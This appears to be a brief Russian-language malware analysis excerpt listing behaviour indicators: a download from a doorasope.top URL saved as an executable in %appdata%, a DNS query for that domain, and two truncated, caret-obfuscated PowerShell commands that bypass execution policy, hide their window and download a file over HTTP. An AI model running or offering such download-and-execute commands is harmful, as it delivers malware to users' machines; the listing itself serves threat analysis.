Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^wER^sh^eLl^.^eXe -Ex^e^CU^t^iO^n^po^LIcY^ ^BYPA^sS ^-^nO^pro^File ^-wI^nD^ow^s^tYl^E ^hidD^E^N^ (^New^-ObJ^ec^T^ S^Ys^T^e^M.N^Et.^WEBCLiE^Nt^).dOWNLo^a^dFi^LE^('http:...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "P^o^wER^sh^eLl^.^eXe -Ex^e^CU^t^iO^n^po^LIcY^ ^BYPA^sS ^-^nO^pro^File ^-wI^nD^ow^s^tYl^E ^hidD^E^N^ (^New^-ObJ^ec^T^ S^Ys^T^e^M.N^Et.^WEBCLiE^Nt^).dOWNLo^a^dFi^LE^('http:...' (со скрытым окном)